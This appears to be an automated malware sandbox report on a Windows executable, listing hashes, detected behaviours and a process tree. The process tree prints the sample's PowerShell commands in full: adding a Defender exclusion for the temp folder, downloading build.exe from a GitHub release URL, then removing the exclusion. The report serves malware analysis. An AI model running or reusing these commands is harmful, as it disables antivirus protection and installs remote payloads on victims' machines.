Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 02:40

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2696

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat

      Filesize

      2KB

      MD5

      1c935ef28fdfd394b770d945d7f04d76

      SHA1

      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

      SHA256

      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

      SHA512

      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      fe5f201dd0f9a8151fa364aea81014fd

      SHA1

      c367b7eb2dd29016eb555cc5985a4c320e06bbdf

      SHA256

      b18e13a950f0a58b6acf293ab5f8528e7106253ba81a100ceeca062c3797a980

      SHA512

      60eb5d358b318e1c7e44c82aa501e767cd45a3010f704604377f9909be3d8b95fcde56297fb8e20793fe10609b79c5a5ee5d9cc3f588b85239a70ddc59842aac

    • memory/2228-11-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-8-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB

    • memory/2228-9-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

    • memory/2228-10-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-12-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-13-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-15-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-14-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

      Filesize

      9.6MB

    • memory/2228-7-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

      Filesize

      4KB

    • memory/2280-0-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2280-28-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2892-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2892-22-0x0000000002870000-0x0000000002878000-memory.dmp

      Filesize

      32KB